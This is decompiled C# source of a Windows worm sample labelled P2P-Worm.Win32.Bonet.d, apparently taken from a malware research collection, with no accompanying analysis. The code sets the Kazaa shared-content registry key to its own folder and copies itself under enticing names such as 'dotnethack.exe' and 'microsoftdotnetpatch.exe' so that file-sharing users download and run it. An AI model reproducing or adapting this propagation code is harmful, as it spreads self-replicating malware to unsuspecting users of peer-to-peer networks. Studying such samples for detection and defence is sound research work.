// Decompiled with JetBrains decompiler // Type: p2pdotnet // Assembly: p2p, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: 9E3614D0-FB94-4D7E-AEE9-6FE0A654E1F0 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\P2P-Worm.Win32.Bonet.d-5e8e645f7b36d24b9942dfc3778a10713b8a0433b2812cd9b53a8f7b2e18dc43.exe using Microsoft.Win32; using System.IO; using System.Reflection; internal class p2pdotnet { public static void Main() { Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory())); Module module = Assembly.GetExecutingAssembly().GetModules()[0]; string[] strArray = new string[8] { "dotnethack.exe", "xboxdotnetemulator.exe", "linuxdotnet.exe", "dosdotnet.exe", "microsoftdotnetpatch.exe", "sha1.exe", "tripleDES.exe", "c#tutorials.exe" }; foreach (string destFileName in strArray) { try { File.Copy(module.FullyQualifiedName, destFileName); } catch { } } } }